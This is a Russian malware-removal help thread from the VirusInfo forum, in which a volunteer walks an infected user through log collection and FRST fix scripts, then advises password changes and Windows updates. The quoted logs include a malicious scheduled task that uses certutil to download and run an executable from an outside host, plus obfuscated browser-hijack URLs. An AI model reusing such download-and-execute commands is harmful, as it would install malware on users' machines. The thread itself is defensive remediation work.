Показано с 1 по 14 из 14.

Заражены windefender.exe, csrss.exe, kmservice.exe. [UDS:DangerousObject.Multi.Generic, UDS:Trojan-Dropper.Win32.Agent.sb] (заявка № 221586)

  1. #1
    Junior Member Репутация
    Регистрация
    20.01.2019
    Сообщений
    6
    Вес репутации
    19

    Заражены windefender.exe, csrss.exe, kmservice.exe. [UDS:DangerousObject.Multi.Generic, UDS:Trojan-Dropper.Win32.Agent.sb]

    Прошу помощи.

    Заражены системные файлы windefender.exe, csrss.exe, kmservice.exe
    Касперский в системной памяти видит trojan.multi.genautorunTask.c
    Как мог удалил все программы, которые были установлены при заражении. Но cloudnet.exe и wup.exe удалить не удалось. После их завершения в процессах и удаления вручную, появляются снова.

    При попытке сделать лог, AVZ виснет, создает только папку Quarantine с 5 файлами .dta и .ini
    Autologger также завершает работу на AVZ, создает папку CrashDumps с файлами avz.exe.808.dmp, chrome.exe.2068.dmp

    Подскажите что сделать, чтобы обратиться за методикой лечения
    Последний раз редактировалось gooderman; 20.01.2019 в 09:58.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) gooderman, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,461
    Вес репутации
    1058
    В безопасном режиме попробуйте логи собрать.
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    20.01.2019
    Сообщений
    6
    Вес репутации
    19
    Не запускается в безопасном режиме и с загрузкой сетевых драйверов в том числе
    Прерывается на загрузке драйвера ClassPNP, далее перезагрузка с предложением восстановления системы

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,461
    Вес репутации
    1058
    HijackThis, расположенный в папке Autologgerзапускается? Если да - сделайте лог.
    WBR,
    Vadim

  7. #6
    Junior Member Репутация
    Регистрация
    20.01.2019
    Сообщений
    6
    Вес репутации
    19
    Цитата Сообщение от Vvvyg Посмотреть сообщение
    HijackThis, расположенный в папке Autologgerзапускается? Если да - сделайте лог.
    Сделал
    Вложения Вложения

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,461
    Вес репутации
    1058
    пофиксите только эти строки:
    Код:
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErU7DQvze26qMhqYS05V2OIohSDdVmZ1An67pNlkvABBU6CzqnC003qzu7j_3A3GvKSogY0_Tmbucm6lxb0LzDItwRJd-309SalKFkedmqvZtR7gQ3_XXfpHL0ypzVu0d9WVt6ggdbvQY2nhuRJhmBe2V8USEjkVL5xqKFB5KR&q={searchTerms}
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErU7DQvze26qMhqYS05V2OIohSDdVmZ1An67pNlkvABBU6CzqnC003qzu7j_3A3GvKSogY0_Tmbucm6lxb0LzDItwRJd-309SalKFkedmqvZtR7gQ3_XXfpHL0ypzVu0d9WVt6ggdbvQY2nhuRJhmBe2V8USEjkVL5xqKFB5KR&q={searchTerms}
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErU7DQvze26qMhqYS05V2OIohSDdVmZ1An67pNlkvABBU6CzqnC003qzu7j_3A3GvKSogY0_Tmbucm6lBPWWFCGgPcs3uw7Ot-azc9x8e2Ur2qmBwfcXxcDzgaOoaBIhM73t5vRaXyKsmLL8xpUD8BvM3rCH9rpz1m9Y4iLnMm
    R0 - HKCU\Software\Microsoft\Internet Explorer\Search: [Default_Search_URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErU7DQvze26qMhqYS05V2OIohSDdVmZ1An67pNlkvABBU6CzqnC003qzu7j_3A3GvKSogY0_Tmbucm6lxb0LzDItwRJd-309SalKFkedmqvZtR7gQ3_XXfpHL0ypzVu0d9WVt6ggdbvQY2nhuRJhmBe2V8USEjkVL5xqKFB5KR&q={searchTerms}
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main: [SearchAssistant] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErU7DQvze26qMhqYS05V2OIohSDdVmZ1An67pNlkvABBU6CzqnC003qzu7j_3A3GvKSogY0_Tmbucm6lxb0LzDItwRJd-309SalKFkedmqvZtR7gQ3_XXfpHL0ypzVu0d9WVt6ggdbvQY2nhuRJhmBe2V8USEjkVL5xqKFB5KR&q={searchTerms}
    R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9}: [URL,TopResultURL] = http://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10477_754_190114&q={searchTerms} - Ad-Aware SecureSearch
    R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}: [URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErU7DQvze26qMhqYS05V2OIohSDdVmZ1An67pNlkvABBU6CzqnC003qzu7j_3A3GvKSogY0_Tmbucm6lxb0LzDItwRJd-309SalKFkedmqvZtR7gQ3_XXfpHL0ypzVu0d9WVt6ggdbvQY2nhuRJhmBe2V8USEjkVL5xqKFB5KR&q={searchTerms} - Search the web
    O4 - HKCU\..\Run: [CloudNet] = C:\Users\SANCHOS\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe 2017
    O4 - MSConfig\startupreg: 2876950 [command] = C:\Users\SANCHOS\AppData\Roaming\wsvsdi52cnr\n3eda4tdlad.exe /VERYSILENT (HKCU) (2019/01/16) (file missing)
    O4 - MSConfig\startupreg: COMODO Internet Security [command] = C:\Program Files\COMODO\COMODO Internet Security\cfp.exe -h (HKLM) (2018/01/03) (file missing)
    O4 - MSConfig\startupreg: CloudNet [command] = C:\Users\SANCHOS\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe 2017 (HKCU) (2019/01/20)
    O4 - MSConfig\startupreg: PG5HZ08T1WRZMPD [command] = C:\Program Files (x86)\ShutdownTime\ETS24.exe (HKCU) (2019/01/16) (file missing)
    O4 - MSConfig\startupreg: WN0APFPE3FBCWHU [command] = C:\Program Files\20FG6PXOQC\20FG6PXOQ.exe (HKCU) (2019/01/16) (file missing)
    O4 - MSConfig\startupreg: Web Companion [command] = C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (HKCU) (2019/01/16) (file missing)
    O15 - Trusted Zone: http://webcompanion.com
    O20 - HKLM\..\Windows: [AppInit_DLLs] = C:\ProgramData\Polygen\BioSanlab.dll (file missing)
    O22 - Task (.job): (Ready) Updater_Online_Application.job - C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe (file missing) /silentall -nofreqcheck
    O22 - Task (.job): (Running) Online Application V2G1.job - C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (file missing) 1 69
    O22 - Task (.job): (Running) Online Application V2G2.job - C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (file missing) 1 70
    O22 - Task (.job): (Running) Online Application V2G3.job - C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (file missing) 1 71
    O22 - Task (.job): (Running) Online Application V2G4.job - C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (file missing) 1 60
    O22 - Task (.job): (Running) Online Application V2G5.job - C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (file missing) 1 61
    O22 - Task (.job): (Running) Online Application V2G6.job - C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (file missing) 1 62
    O22 - Task: ScheduledUpdate - C:\Windows\system32\cmd.exe /C certutil.exe -urlcache -split -f http://headbuild.info/app/app.exe C:\Users\SANCHOS\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SANCHOS\AppData\Local\Temp\csrss\scheduled.exe /31340
    O22 - Task: Updater_Online_Application - C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe /silentall -nofreqcheck (file missing)
    O22 - Task: csrss - C:\Windows\rss\csrss.exe
    O22 - Task: lsa64 - C:\Users\SANCHOS\AppData\Local\Temp\csrss\lsa64install.exe (file missing)
    Перезагрузите систему.

    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  9. #8
    Junior Member Репутация
    Регистрация
    20.01.2019
    Сообщений
    6
    Вес репутации
    19
    Сделал.
    Вложения Вложения
    • Тип файла: zip FRST.zip (24.8 Кб, 2 просмотров)

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,461
    Вес репутации
    1058
    Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:
    Код:
    CreateRestorePoint:
    CloseProcesses:
    () C:\Windows\windefender.exe
    () C:\Windows\rss\csrss.exe
    () C:\Users\SANCHOS\AppData\Local\Temp\wup\wup.exe
    (EpicNet Inc.) C:\Users\SANCHOS\AppData\Local\Temp\csrss\cloudnet.exe
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-4209359731-2217728689-3918005546-1000\...\Run: [AdobeBridge] => [X]
    HKU\S-1-5-21-4209359731-2217728689-3918005546-1000\...\Run: [CloudNet] => C:\Users\SANCHOS\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-01-21] (EpicNet Inc.) <==== ATTENTION
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErU7DQvze26qMhqYS05V2OIohSDdVmZ1An67pNlkvABBU6CzqnC003qzu7j_3A3GvKSogY0_Tmbucm6lxb0LzDItwRJd-309SalKFkedmqvZtR7gQ3_XXfpHL0ypzVu0d9WVt6ggdbvQY2nhuRJhmBe2V8USEjkVL5xqKFB5KR&q={searchTerms}
    BHO: No Name -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> No File
    FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\aqrqbdqtzm3.js [2019-01-14] <==== ATTENTION (Points to *.cfg file)
    FF ExtraCheck: C:\Program Files\mozilla firefox\aqrqbdqtzm3.cfg [2019-01-14] <==== ATTENTION
    R2 WinDefender; C:\Windows\windefender.exe [1435136 2019-01-21] ()
    S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ATTENTION
    2019-01-21 14:46 - 2019-01-21 14:46 - 001435136 _____ C:\Windows\windefender.exe
    C:\Windows\rss\csrss.exe
    C:\Windows\rss
    C:\Users\SANCHOS\AppData\Local\Temp\csrss\cloudnet.exe
    C:\Users\SANCHOS\AppData\Local\Temp\csrss
    C:\Users\SANCHOS\AppData\Local\Temp\wup\wup.exe
    C:\Users\SANCHOS\AppData\Local\Temp\wup
    2019-01-21 17:10 - 2019-01-21 17:10 - 000000000 ____D C:\Users\SANCHOS\AppData\Roaming\EpicNet Inc
    Virustotal: C:\Windows\SysWOW64\winver.exe
    Virustotal: C:\Users\SANCHOS\Downloads\RE Vision FX Effections Plus 17.0 RePack by Team V.R.exe
    2019-01-17 22:22 - 2018-09-18 22:47 - 000298241 ____N C:\Windows\Minidump\011619-9391-01.dmp
    2019-01-08 18:23 - 2014-02-02 15:43 - 000000000 ____D C:\ProgramData\boost_interprocess
    Task: {15A7DD2D-FAB5-456A-B9E3-B97C8E7A9B07} - \Online Application V2G6 -> No File <==== ATTENTION
    Task: {3A1C286B-950A-4D02-8831-47868F303A5F} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-01-21] () <==== ATTENTION
    Task: {712C01A2-92B6-4220-B836-7ACE49AF5421} - \Online Application V2G5 -> No File <==== ATTENTION
    Task: {76DE1FEA-8BFE-4A7B-B70D-040986E8774C} - \Online Application V2G4 -> No File <==== ATTENTION
    Task: {BB22FAF6-DB4B-45B3-A708-33D916E8A837} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://headbuild.info/app/app.exe C:\Users\SANCHOS\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SANCHOS\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    Task: {C581E115-65F8-4BA1-BE71-F82786C048E6} - \Online Application V2G2 -> No File <==== ATTENTION
    Task: {DC5DAD63-931B-4CD2-BBBC-C7051A76091D} - \Online Application V2G3 -> No File <==== ATTENTION
    Task: {FA3530A3-62D3-4083-8F72-53E940F434A9} - \Online Application V2G1 -> No File <==== ATTENTION
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\":
    WMI:subscription\__EventFilter->BVTFilter:
    WMI:subscription\CommandLineEventConsumer->BVTConsumer:
    ShortcutWithArgument: C:\Users\SANCHOS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Users\SANCHOS\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
    ShortcutWithArgument: C:\Users\SANCHOS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\Users\SANCHOS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Users\SANCHOS\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
    ShortcutWithArgument: C:\Users\SANCHOS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Users\SANCHOS\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
    ShortcutWithArgument: C:\Users\SANCHOS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
    AlternateDataStreams: C:\ProgramData\TEMP:2F091A97 [121]
    MSCONFIG\startupreg: SnowyPond => "C:\Windows\rss\csrss.exe"
    FirewallRules: [{05117D31-E2F8-4F92-B0B8-5C01536D638C}] => (Allow) C:\Windows\rss\csrss.exe ()
    FirewallRules: [{C587872E-6EC4-42AA-B992-76BBAC1EFC09}] => (Allow) C:\Users\SANCHOS\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
    FirewallRules: [{E32D7278-D0F0-446A-B5C2-EFD65D9623A9}] => (Allow) C:\Users\SANCHOS\AppData\Local\Temp\csrss\lsa64.exe No File
    FirewallRules: [{058C57B8-27D0-426D-ABCE-530BD07D0B27}] => (Allow) C:\Users\SANCHOS\AppData\Local\Temp\csrss\lsa64.exe No File
    FirewallRules: [{17967D7D-8F75-4CF9-8639-9FF438D7B971}] => (Allow) C:\Users\SANCHOS\AppData\Local\Temp\csrss\lsa64.exe No File
    FirewallRules: [{F5BBE2E1-09C1-4A94-9B05-EBDC58C08A40}] => (Allow) C:\Users\SANCHOS\AppData\Local\Temp\csrss\lsa64.exe No File
    FirewallRules: [{C6B579D7-566E-4A0E-B1AD-946C439509F3}] => (Allow) C:\Users\SANCHOS\AppData\Local\Temp\csrss\lsa64.exe No File
    Reg: reg delete "HKU\S-1-5-21-4209359731-2217728689-3918005546-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet" /f
    Reboot:
    и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
    Отключите до перезагрузки антивирус, закройте все браузеры, запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен автоматически.
    WBR,
    Vadim

  11. #10
    Junior Member Репутация
    Регистрация
    20.01.2019
    Сообщений
    6
    Вес репутации
    19
    Готово. Только Юникод не выбрал при создании fixlist.txt
    Вложения Вложения

  12. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,461
    Вес репутации
    1058
    Что с проблемой сейчас?

    Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
    Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
    Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

    Приложите этот файл к своему следующему сообщению.
    WBR,
    Vadim

  13. #12
    Junior Member Репутация
    Регистрация
    20.01.2019
    Сообщений
    6
    Вес репутации
    19
    В общем система работает стабильно. Подозрительных процессов не видно. Трафик не ползет.
    Эти трояны и объекты подозрительные какой вред могли нанести или нанесли? Что сделать, что изменить? Пароли? аккаунты?
    Спасибо
    Вложения Вложения

  14. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,461
    Вес репутации
    1058
    Минимум один зловред проходит как Trojan.PWS.Stealer, так что пароли от всех ресурсов надо менять.
    Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
    ^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
    Установите Internet Explorer 11, даже если им не пользуетесь, это критически важный для безопасности компонент Windows.
    Контроль учётных записей пользователя отключен
    Рекомендую ознакомиться со статьёй Так ли страшен контроль учетных записей (UAC)? и включить.
    ------------------------------- [ HotFix ] --------------------------------
    HotFix KB3115858 Внимание! Скачать обновления
    HotFix KB3140735 Внимание! Скачать обновления
    HotFix KB3138910 Внимание! Скачать обновления
    HotFix KB3138962 Внимание! Скачать обновления
    HotFix KB3145739 Внимание! Скачать обновления
    HotFix KB3146963 Внимание! Скачать обновления
    HotFix KB3156013 Внимание! Скачать обновления
    HotFix KB3156016 Внимание! Скачать обновления
    HotFix KB3155178 Внимание! Скачать обновления
    HotFix KB3153171 Внимание! Скачать обновления
    HotFix KB3170455 Внимание! Скачать обновления
    HotFix KB3178034 Внимание! Скачать обновления
    HotFix KB3185911 Внимание! Скачать обновления
    HotFix KB3184122 Внимание! Скачать обновления
    HotFix KB3192391 Внимание! Скачать обновления
    HotFix KB3197867 Внимание! Скачать обновления
    HotFix KB3205394 Внимание! Скачать обновления
    HotFix KB4012212 Внимание! Скачать обновления
    HotFix KB4019263 Внимание! Скачать обновления
    HotFix KB4022722 Внимание! Скачать обновления
    HotFix KB4015546 Внимание! Скачать обновления
    HotFix KB4025337 Внимание! Скачать обновления
    HotFix KB4034679 Внимание! Скачать обновления
    HotFix KB4041678 Внимание! Скачать обновления
    HotFix KB4056894 Внимание! Скачать обновления
    HotFix KB4056897 Внимание! Скачать обновления
    HotFix KB4074587 Внимание! Скачать обновления
    HotFix KB4103712 Внимание! Скачать обновления
    HotFix KB4343899 Внимание! Скачать обновления
    HotFix KB4457145 Внимание! Скачать обновления
    HotFix KB4462923 Внимание! Скачать обновления
    HotFix KB4480970 Внимание! Скачать обновления
    HotFix KB4487345 Внимание! Скачать обновления
    Устанавливайте, это только критические хотфиксы, включая KB4012212, который закрывает опаснейшую уязвимость, используемую в т. ч. нашумевшими в 2017 году шифровальщики WannaCry и Petya/NotPetya, а также многими майнерами и троянами.
    Kaspersky Internet Security v.15.0.2.396 Внимание! Скачать обновления
    Устаревшая давно версия.

    Обновляйте, удаляйте:
    QuickTime 7 v.7.79.80.95 Данная программа больше не поддерживается разработчиком и имеет известные проблемы безопасности! Рекомендуется деинсталлировать данное ПО.
    --------------------------- [ AdobeProduction ] ---------------------------
    Adobe Flash Player 11 ActiveX 64-bit v.11.1.102.55 Внимание! Скачать обновления
    Adobe Reader X (10.0.1) - Russian v.10.0.1 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Adobe Acrobat Reader DC.
    ------------------------------- [ Browser ] -------------------------------
    Mozilla Firefox 45.0.2 (x64 ru) v.45.0.2 Внимание! Скачать обновления
    ^Проверьте обновления через меню Справка - О Firefox!^
    Google Chrome v.49.0.2623.112 Внимание! Скачать обновления
    ^Проверьте обновления через меню Справка - О Google Chrome!^
    WBR,
    Vadim

  15. #14
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    977

    =C8=F2=EE=E3 =EB=E5=F7=E5=ED=E8=FF

    =D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
    =E5=F7=E5=ED=E8=FF:
    • =CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: 1
    • =CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: 5
    • =C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
      =E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
      1. c:\users\sanchos\appdata\local\temp\csrss\cloudnet .exe - [B=
        ]Trojan.Win32.Agentb.jjuu[/B] ( AVAST4: Win32:CrypterX-gen [Trj] )
      2. c:\users\sanchos\appdata\roaming\epicnet inc\cloudnet\cloud=
        net.exe - Trojan.Win32.Agentb.jjuu ( AVAST4: Win32:CrypterX-gen=
        [Trj] )
      3. c:\windows\kmsem\kmservice.exe - not-a-virus:RiskTool.Win32.=
        HackKMS.c
      4. c:\windows\rss\csrss.exe - UDS:DangerousObject.Multi.Generic=
        ( AVAST4: Win32:Malware-gen )
      5. c:\windows\windefender.exe - UDS:Trojan-Dropper.Win32.Agent.s=
        b
        ( AVAST4: Win32:Trojan-gen )

  • Уважаемый(ая) gooderman, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Ответов: 2
      Последнее сообщение: 14.01.2018, 10:23
    2. Ответов: 13
      Последнее сообщение: 26.08.2016, 21:00
    3. Злобный windefender.exe
      От Cool JO в разделе Помогите!
      Ответов: 11
      Последнее сообщение: 28.11.2011, 21:36
    4. Ответов: 3
      Последнее сообщение: 22.06.2011, 20:37
    5. Ответов: 3
      Последнее сообщение: 28.05.2011, 22:30

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00831 seconds with 20 queries